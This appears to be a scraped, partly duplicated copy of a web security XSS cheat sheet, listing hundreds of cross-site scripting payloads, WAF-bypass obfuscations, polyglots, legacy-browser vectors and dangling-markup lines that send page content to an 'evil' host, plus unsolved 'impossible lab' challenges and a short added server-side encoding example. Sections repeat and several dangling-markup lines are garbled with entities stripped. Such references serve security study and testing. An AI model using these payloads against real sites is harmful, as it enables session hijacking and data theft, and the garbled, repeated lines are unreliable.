XSS into a JavaScript string, RegExp source property (this)
this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (top)
top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (parent)
parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (frames)
frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (globalThis)
globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (window)
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (self)
self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (this)
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (top)
top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (parent)
parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (frames)
frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis)
globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
Impossible labs
Basic context, WAF blocks <[a-zA-Z]
This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A. Closest vector: N/A.
Script based injection but quotes, forward slash and backslash are escaped
We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/backslashes are escaped so you can't simply close the script block.
The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.
Length limit: N/A. Closest vector: N/A.
innerHTML context but no equals allowed
You have a site that processes the query string and URL decodes the parameters, but splits on the equals then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.
Length limit: N/A. Closest vector: N/A.
Basic context, length limit
This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters: <q/oncut=alert``, but can you beat it?
Length limit: 15. Closest vector: <q oncut=alert``
Attribute context, length limit
The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters: oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14. Closest vector: oncut=alert``
Basic context, length limit, arbitrary code
It's all well and good executing JavaScript, but if all you can do is call alert what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19. Closest vector: <q/oncut=eval(name)
Attribute context, length limit, arbitrary code
Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.
Length limit: 17. Closest vector: see link.
Injection occurs inside a frameset but before the body
We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A. Closest vector: N/A.
Injection occurs inside single quoted string, only characters a-z0-9+` are allowed
The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A. Closest vector: N/A.
Classic vectors (XSS crypt)
Image src with JavaScript protocol
<img src="javascript:alert(1)">
Body background with JavaScript protocol
<body background="javascript:alert(1)">
Iframe data URLs no longer work as modern browsers use a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol used to work in IE
<a href="vbscript:MsgBox+1">XSS</a>
<a href="#" onclick="vbs:Msgbox+1">XSS</a>
<a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="#" language=vbs onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE
<a href="#" onclick="jscript.compact:alert(1);">test</a>
<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript
<a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript
<iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
<iframe language=VBScript.Encode onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator
<a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator
<link href="xss.js" rel=stylesheet type="text/javascript">
Button used to consume markup
<form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only <= 2
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="\-\mo\z-binding:\url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
XBL also worked in FF3.5 using data URLs
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">
CSS expressions, <= IE7
<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of :
<div style=xss=expression(alert(1))>
<div style="color&#x3d;red">test</div>
Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions
<script>function window.onload(){alert(1)}</script>
<script>function window::onload(){alert(1)}</script>
<script>function window.location(){}</script>
<body><script>function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}</script></body>
<body><script>function document.body.innerHTML(){x='<img src=1 onerror=alert(1)>'}</script></body>
GreyMagic HTML+time exploit (no longer works, even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after &
<a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities
<a href="javascript&colon;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>
Isindex using src attribute
<isindex type=image src="//evil?
Isindex using submit
<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Isindex and formaction
<isindex type=submit formaction="javascript:alert(1)">
Isindex and action
<isindex type=submit action="javascript:alert(1)">
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
This cheat sheet wouldn't be possible without the web security community who share their research. Big thanks to James Kettle, Mario Heiderich, Eduardo Vela, Masato Kinugawa, Filedescriptor, LeverOne, Ben Hayak, Alex Inführ, Mathias Karlsson, Jan Horn, Ian Hickey, Gábor Molnár, tsetnep, Psych0tr1a, Skyphire, Abdulrhman Alqabandi, brainpillow, Kyo, Yosuke Hasegawa, White Jordan, Algol, jackmasa, wpulog, Bolk, Robert Hansen, David Lindsay, Superhei, Michal Zalewski, Renaud Lifchitz, Roman Ivanov, Frederik Braun, Krzysztof Kotowicz, Giorgio Maone, GreyMagic, Marcus Niemietz, Soroush Dalili, Stefano Di Paola, Roman Shafigullin, Lewis Ardern, Michał Bentkowski, SØᴘᴀS, avanish46, Juuso Käenmäki, jinmo123, itszn13, Martin Bajanik, David Granqvist, Andrea (theMiddle) Menin, simps0n, hahwul, Paweł Hałdrzyński, Jun Kokatsu, RenwaX23, sratarun, har1sec, Yann C., gadhiyasavan, p4fg, diofeher.
You can contribute to this cheat sheet by creating a new issue or updating the JSON and creating a pull request.
Embed src ltembed src evil
Use textarea to consume markup and post toexternal site
ltformgtltbutton formaction=evilgtXSSltbuttongtlttextarea name=xgt
Pass markup data through windowname using formtarget
ltbutton form=xgtXSSltbuttongtltform id=x action=evil target=
Pass markup data through windowname using basetarget
lta href=httpsubdomain1portswigger-labsnetdangling_markupnamehtmlgtltfont size=100 color=redgtYou must click meltfontgtltagtltbase target=
Pass markup data through windowname usingformtarget
ltformgtltinput type=submit value=Click me formaction=httpsubdomain1portswigger-labsnetdangling_markupnamehtml formtarget=
Using base href to pass data lta href=abc style=width100height100positionabsolutefont-size1000pxgtxssltbase href=evil
Using embed window name to pass data from thepage
ltembed src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using iframe window name to pass data from thepage
ltiframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using object window name to pass data from thepage
ltobject data=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Using frame window name to pass data from thepage
ltframesetgtltframe src=httpsubdomain1portswigger-labsnetdangling_markupnamehtml name=
Overwrite type attribute with image in hidden inputs ltinput type=hidden type=image src=evil
Polyglots
Polyglot payload 1
javascript:/*--></title></style></textarea></script></xmp><svg/onload='+/"/+/onmouseover=1/+/[*/[]/+alert(1)//'>
Polyglot payload 2
javascript:"/*'/*`/*--></noscript></title></textarea></style></template></noembed></script><html \" onmouseover=/*&lt;svg/*/onload=alert()//>
Polyglot payload 3
javascript:/*--></title></style></textarea></script></xmp><details/open/ontoggle='+/`/+/"/+/onmouseover=1/+/[*/[]/+alert(/@PortSwiggerRes/)//'>
WAF bypass global objects
XSS into a JavaScript string, string concatenation (window)
window["ale"+"rt"](window["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (self)
self["ale"+"rt"](self["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (this)
this["ale"+"rt"](this["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (top)
top["ale"+"rt"](top["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (parent)
parent["ale"+"rt"](parent["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (frames)
frames["ale"+"rt"](frames["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, string concatenation (globalThis)
globalThis["ale"+"rt"](globalThis["doc"+"ument"]["dom"+"ain"])
XSS into a JavaScript string, comment syntax (window)
window[/*foo*/"alert"/*bar*/](window[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (self)
self[/*foo*/"alert"/*bar*/](self[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (this)
this[/*foo*/"alert"/*bar*/](this[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (top)
top[/*foo*/"alert"/*bar*/](top[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (parent)
parent[/*foo*/"alert"/*bar*/](parent[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (frames)
frames[/*foo*/"alert"/*bar*/](frames[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, comment syntax (globalThis)
globalThis[/*foo*/"alert"/*bar*/](globalThis[/*foo*/"document"/*bar*/]["domain"])
XSS into a JavaScript string, hex escape sequence (window)
window["\x61\x6c\x65\x72\x74"](window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (self)
self["\x61\x6c\x65\x72\x74"](self["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (this)
this["\x61\x6c\x65\x72\x74"](this["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (top)
top["\x61\x6c\x65\x72\x74"](top["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (parent)
parent["\x61\x6c\x65\x72\x74"](parent["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (frames)
frames["\x61\x6c\x65\x72\x74"](frames["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence (globalThis)
globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x64\x6f\x6d\x61\x69\x6e"])
XSS into a JavaScript string, hex escape sequence and base64 encoded string (window)
window["\x65\x76\x61\x6c"](window["\x61\x6c\x65\x72\x74"](window["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (self)
self["\x65\x76\x61\x6c"](self["\x61\x6c\x65\x72\x74"](self["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (this)
this["\x65\x76\x61\x6c"](this["\x61\x6c\x65\x72\x74"](this["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (top)
top["\x65\x76\x61\x6c"](top["\x61\x6c\x65\x72\x74"](top["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (parent)
parent["\x65\x76\x61\x6c"](parent["\x61\x6c\x65\x72\x74"](parent["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (frames)
frames["\x65\x76\x61\x6c"](frames["\x61\x6c\x65\x72\x74"](frames["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, hex escape sequence and base64 encoded string (globalThis)
globalThis["\x65\x76\x61\x6c"](globalThis["\x61\x6c\x65\x72\x74"](globalThis["\x61\x74\x6f\x62"]("WFNT")))
XSS into a JavaScript string, octal escape sequence (window)
window['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (self)
self['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (this)
this['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (top)
top['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (parent)
parent['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (frames)
frames['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, octal escape sequence (globalThis)
globalThis['\141\154\145\162\164']('\130\123\123')
XSS into a JavaScript string, unicode escape (window)
window['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (self)
self['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (this)
this['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (top)
top['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (parent)
parent['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (frames)
frames['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, unicode escape (globalThis)
globalThis['\u0061\u006c\u0065\u0072\u0074']('\u0058\u0053\u0053')
XSS into a JavaScript string, RegExp source property (window)
window[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (self)
self[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (this)
this[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (top)
top[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (parent)
parent[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (frames)
frames[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, RegExp source property (globalThis)
globalThis[/al/.source+/ert/.source](/XSS/.source)
XSS into a JavaScript string, Hieroglyphy/JSFuck (window)
window[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (self)
self[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (this)
this[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (top)
top[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (parent)
parent[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (frames)
frames[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
XSS into a JavaScript string, Hieroglyphy/JSFuck (globalThis)
globalThis[(+{}+[])[+!![]]+(![]+[])[!+[]+!![]]+([][[]]+[])[!+[]+!![]+!![]]+(!![]+[])[+!![]]+(!![]+[])[+[]]]((+{}+[])[+!![]])
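Every row in the table above resolves to the same alert call; the variants exist because a filter that keyword-matches the raw input cannot keep pace with string escapes, concatenation and RegExp tricks. The defence that actually holds for the "XSS into a JavaScript string" context is context-aware output encoding on the server. The following is an added example and not code from the cheat sheet or from PortSwigger: encodeForJsString, renderInlineScript, roundTrips, isInert and the SAMPLES inputs are this example's own constructions, and it assumes the untrusted value is being placed inside a single-quoted string literal in an inline script.

```javascript
// Added example, not part of the PortSwigger cheat sheet: server-side encoding
// that keeps untrusted data inert inside a JavaScript string literal. Helper
// names (encodeForJsString, renderInlineScript, ...) are this example's own.

// Escape every character outside a conservative allow-list as \uXXXX. Quotes
// and backslashes can then no longer terminate the literal; "<", ">", "&" and
// "/" cannot form "</script>" or an HTML entity; and U+2028/U+2029 (JavaScript
// line terminators) cannot break the statement. Non-ASCII data survives as
// escapes and decodes back to the same text in the browser.
function encodeForJsString(input) {
  return String(input).replace(/[^A-Za-z0-9 ,.\-_:]/g, function (ch) {
    return "\\u" + ch.charCodeAt(0).toString(16).padStart(4, "0");
  });
}

// What a template would emit when reflecting a query parameter into an inline
// script. The single quotes are the only delimiters; the encoded value is
// guaranteed to contain none.
function renderInlineScript(untrustedName) {
  return "<script>var name = '" + encodeForJsString(untrustedName) + "';</script>";
}

// Decode the literal exactly as a browser would and confirm the original text
// comes back as data rather than running. Function() is acceptable here only
// because the body contains nothing but allow-listed characters and \u escapes.
function roundTrips(input) {
  var encoded = encodeForJsString(input);
  var decoded = new Function("return '" + encoded + "';")();
  return decoded === input;
}

// True when, apart from well-formed \uXXXX escapes, the encoded form contains
// none of the characters that could change the parse of the script or the HTML.
function isInert(encoded) {
  var bare = encoded.replace(/\\u[0-9a-f]{4}/g, "");
  return !/['"\\<>&\/\u2028\u2029]/.test(bare);
}

// Constructed samples: the cheat sheet's own "XSS into a JavaScript string"
// vectors, treated here as untrusted input, plus ordinary data with awkward
// characters that a correct encoder must preserve.
var SAMPLES = [
  'window["ale"+"rt"](window["doc"+"ument"]["dom"+"ain"])',
  'window["\\x61\\x6c\\x65\\x72\\x74"]("\\x58\\x53\\x53")',
  "window['\\u0061\\u006c\\u0065\\u0072\\u0074']('\\u0058\\u0053\\u0053')",
  "window[/al/.source+/ert/.source](/XSS/.source)",
  "O'Brien \u2028 <b>&amp;</b>"
];

// Every sample must both survive the round trip and be inert once encoded.
function allSamplesInert() {
  return SAMPLES.every(function (s) {
    return roundTrips(s) && isInert(encodeForJsString(s));
  });
}

if (typeof require !== "undefined" && require.main === module) {
  SAMPLES.forEach(function (s) { console.log(renderInlineScript(s)); });
  console.log("all samples inert and round-trip:", allSamplesInert());
}
```

The allow-list is deliberately tiny: it is far easier to reason about a handful of permitted characters than to enumerate every character a WAF rule would need to block, which is exactly the asymmetry the table above exploits.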
Impossible labs
Title: Basic context, WAF blocks <[a-zA-Z]
Description: This lab captures the scenario when you can't use an open tag followed by an alphanumeric character. Sometimes you can solve this problem by bypassing the WAF entirely, but what about when that's not an option? Certain versions of .NET have this behaviour and it's only known to be exploitable in old IE with <%tag.
Length limit: N/A. Closest vector: N/A.
Title: Script based injection but quotes, forward slash and backslash are escaped
Description: We often encounter this situation in the wild: you have an injection inside a JavaScript variable and can inject angle brackets, but quotes and forward/back slashes are escaped, so you can't simply close the script block. The closest we've got to solving this is when you have multiple injection points: the first within a script based context and the second in HTML.
Length limit: N/A. Closest vector: N/A.
Title: innerHTML context but no equals allowed
Description: You have a site that processes the query string and URL decodes the parameters, but splits on the equals and then assigns to innerHTML. In this context <script> doesn't work and we can't use = to create an event.
Length limit: N/A. Closest vector: N/A.
Title: Basic context, length limit
Description: This lab's injection occurs within the basic HTML context but has a length limitation of 15. Filedescriptor came up with a vector that could execute JavaScript in 16 characters, <q/oncut=alert``, but can you beat it?
Length limit: 15. Closest vector: <q oncut=alert``
Title: Attribute context, length limit
Description: The context of this lab is inside an attribute with a length limitation of 14 characters. We came up with a vector that executes JavaScript in 15 characters, oncut=alert``+ (the plus is a trailing space). Do you think you can beat it?
Length limit: 14. Closest vector: oncut=alert`` (followed by a space)
Title: Basic context, length limit, arbitrary code
Description: It's all well and good executing JavaScript, but if all you can do is call alert, what use is that? In this lab we demonstrate the shortest possible way to execute arbitrary code.
Length limit: 19. Closest vector: <q/oncut=eval(name)
Title: Attribute context, length limit, arbitrary code
Description: Again, calling alert proves you can call a function, but we created another lab to find the shortest possible attribute based injection with arbitrary JavaScript.
Length limit: 17. Closest vector: see link.
Title: Injection occurs inside a frameset but before the body
Description: We received a request from Twitter about this next lab. It occurs within a frameset but before a body tag, with equals filtered. You would think you could inject a closing frameset followed by a script block, but that would be too easy.
Length limit: N/A. Closest vector: N/A.
Title: Injection occurs inside single quoted string, only characters a-z0-9+` are allowed
Description: The injection occurs within a single quoted string and the challenge is to execute arbitrary code using the charset a-zA-Z0-9+`.
Length limit: N/A. Closest vector: N/A.
Classic vectors (XSS crypt)
Image src with JavaScript protocol
<img src="javascript:alert(1)">
Body background with JavaScript protocol
<body background="javascript:alert(1)">
Iframe data URLs no longer work, as modern browsers use a null origin
<iframe src="data:text/html,<img src=1 onerror=alert(document.domain)>">
VBScript protocol used to work in IE
<a href="vbscript:MsgBox+1">XSS</a>
<a href="#" onclick="vbs:Msgbox+1">XSS</a>
<a href="#" onclick="VBS:Msgbox+1">XSS</a>
<a href="#" onclick="vbscript:Msgbox+1">XSS</a>
<a href="#" onclick="VBSCRIPT:Msgbox+1">XSS</a>
<a href="#" language="vbs" onclick="vbscript:Msgbox+1">XSS</a>
JScript compact was a minimal version of JS that wasn't widely used in IE
<a href="#" onclick="jscript.compact:alert(1);">test</a>
<a href="#" onclick="JSCRIPT.COMPACT:alert(1);">test</a>
JScript.Encode allows encoded JavaScript
<a href="#" language="JScript.Encode" onclick="#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
<a href="#" onclick="JScript.Encode:#@~^CAAAAA==C^+.D`8#mgIAAA==^#~@">XSS</a>
VBScript.Encode allows encoded VBScript
<iframe onload="VBScript.Encode:#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
<iframe language="VBScript.Encode" onload="#@~^CAAAAA==\ko$K6,FoQIAAA==^#~@">
JavaScript entities used to work in Netscape Navigator
<a title="&{alert(1)}">XSS</a>
JavaScript stylesheets used to be supported by Netscape Navigator
<link href="xss.js" rel="stylesheet" type="text/javascript">
Button used to consume markup
<form><button name=x formaction=x><b>stealme
IE9 select elements and plaintext used to consume markup
<form action=x><button>XSS</button><select name=x><option><plaintext><script>token="supersecret"</script>
XBL, Firefox only <= 2
<div style="-moz-binding:url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="\-\mo\z-binding:\url(//businessinfo.co.uk/labs/xbl/xbl.xml#xss)">
<div style="-moz-bindin\67:url(//businessinfo.co.uk/lab\s/xbl/xbl.xml#xss)">
<div style="-moz-bindin&#x5c;67:url(//businessinfo.co.uk/lab\s/xbl/xbl.xml#xss)">
XBL also worked in FF3.5 using data URLs
<img src="blah" style="-moz-binding: url(data:text/xml;charset=utf-8,%3C%3Fxml%20version%3D%221.0%22%3F%3E%3Cbindings%20xmlns%3D%22http%3A//www.mozilla.org/xbl%22%3E%3Cbinding%20id%3D%22loader%22%3E%3Cimplementation%3E%3Cconstructor%3E%3C%21%5BCDATA%5Bvar%20url%20%3D%20%22alert.js%22%3B%20var%20scr%20%3D%20document.createElement%28%22script%22%29%3B%20scr.setAttribute%28%22src%22%2Curl%29%3B%20var%20bodyElement%20%3D%20document.getElementsByTagName%28%22html%22%29.item%280%29%3B%20bodyElement.appendChild%28scr%29%3B%20%5D%5D%3E%3C/constructor%3E%3C/implementation%3E%3C/binding%3E%3C/bindings%3E)">
CSS expressions, <= IE7
<div style=xss:expression(alert(1))>
<div style=xss:expression(1)-alert(1)>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio\006e(alert(1))>
<div style=xss:expressio\00006e(alert(1))>
<div style=xss:expressio\6e(alert(1))>
<div style=xss:expressio&#x5c;6e(alert(1))>
In quirks mode IE allowed you to use = instead of :
<div style=xss=expression(alert(1))>
<div style="color&#x3d;red">test</div>
Behaviors for older modes of IE
<a style="behavior:url(#default#AnchorClick);" folder="javascript:alert(1)">XSS</a>
Older versions of IE supported event handlers in functions
<script>
function window.onload(){
alert(1)
}
</script>
<script>
function window::onload(){
alert(1)
}
</script>
<script>
function window.location(){
}
</script>
<body>
<script>
function/*<img src=1 onerror=alert(1)>*/document.body.innerHTML(){}
</script>
</body>
<body>
<script>
function document.body.innerHTML(){ x = "<img src=1 onerror=alert(1)>"; }
</script>
</body>
GreyMagic HTML+time exploit (no longer works, even in 5 docmode)
<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<img src=1 onerror=alert(1)>"> </BODY></HTML>
Firefox allows NULLs after & (a NUL byte follows the ampersand in the original vector)
<a href="javascript:&#x6a;avascript:alert(1)">Firefox</a>
Firefox allows NULLs inside named entities (a NUL byte sits inside the entity in the original vector)
<a href="javascript:&colon;alert(1)">Firefox</a>
Firefox allows NULL characters inside opening comments (the NUL bytes are not shown here)
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
<!-- ><img title="--><iframe/onload=alert(1)>"> -->
Safari used to allow any tag to have an onload event inside SVG
<svg><xss onload=alert(1)>
Isindex using src attribute
<isindex type=image src="//evil?
Isindex using submit
<isindex type=submit style=width:100%;height:100%; value=XSS formaction="//evil?
Isindex and formaction
<isindex type=submit formaction=javascript:alert(1)>
Isindex and action
<isindex type=submit action=javascript:alert(1)>
Credits
Brought to you by PortSwigger, lovingly constructed by Gareth Heyes.
